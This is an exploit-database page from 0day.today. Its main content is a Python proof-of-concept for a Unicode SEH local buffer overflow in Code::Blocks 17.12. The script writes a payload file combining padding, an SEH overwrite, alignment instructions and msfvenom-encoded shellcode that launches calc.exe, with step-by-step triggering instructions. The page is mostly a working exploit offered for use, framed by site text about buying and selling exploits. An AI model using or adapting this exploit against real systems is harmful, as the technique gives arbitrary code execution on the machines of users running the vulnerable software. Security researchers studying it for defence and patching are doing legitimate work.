0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Code Blocks 17.12 - (File Name) Local Buffer Overflow (Unicode) (SEH) Exploit
[# Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)
# Vendor Homepage: http://www.codeblocks.org/
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download
# Exploit Author: Paras Bhatia
# Vulnerable Software: Code Blocks
# Version: 17.12
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
#Steps to Produce the Crash:
# 1.- Run python code: codeblocks.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for codeblocks.exe
# 4.- Open "codeblocks.exe"
# 5.- Go to "File" > "New" > "Project..."
# 6.- Click on "Files" from left box > Select "C/C++ header" > Clickon "Go" > Click on "Next"
# 7.- Paste ClipBoard into the "Filename with fullpath:" .
# 8.- Click on "Finish".
# 9.- Calc.exe runs.
#################################################################################################################################################
#Python "codeblocks.py" Code:
f= open("codeblocks.txt", "w")
junk1="A" * 2006
nseh="\x61\x62" #popad / align
#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\CodeBlocks\codeblocks.exe
seh="\xe0\x50"
ven = "\x62" #align
ven +="\x53" #push ebx
ven += "\x62" #align
ven += "\x58" #pop eax
ven += "\x62" #align
ven += "\x05\x14\x11" #add eax, 0x11001400
ven += "\x62" #align
ven += "\x2d\x13\x11" #sub eax, 0x11001300
ven += "\x62" #align
ven += "\x50" #push eax
ven += "\x62" #align
ven += "\xc3" #ret
junk2="\x41" * 108 #required to make sure shellcode = eax
#msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72"
buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50"
buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b"
buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52"
buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31"
buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c"
buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37"
buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a"
buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71"
buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34"
buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79"
buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52"
buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71"
buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30"
buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d"
buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c"
buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b"
buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b"
buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34"
buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32"
buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b"
buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64"
buf += "\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30"
buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66"
buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78"
buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d"
buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70"
buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52"
buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43"
buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53"
buf += "\x35\x6d\x30\x41\x41"
junk3 = "\x62" * 5000 #padding to crash
payload = junk1 + nseh + seh + ven + junk2 + buf +junk3
f.write(payload)
f.close
# 0day.today [2024-11-15] #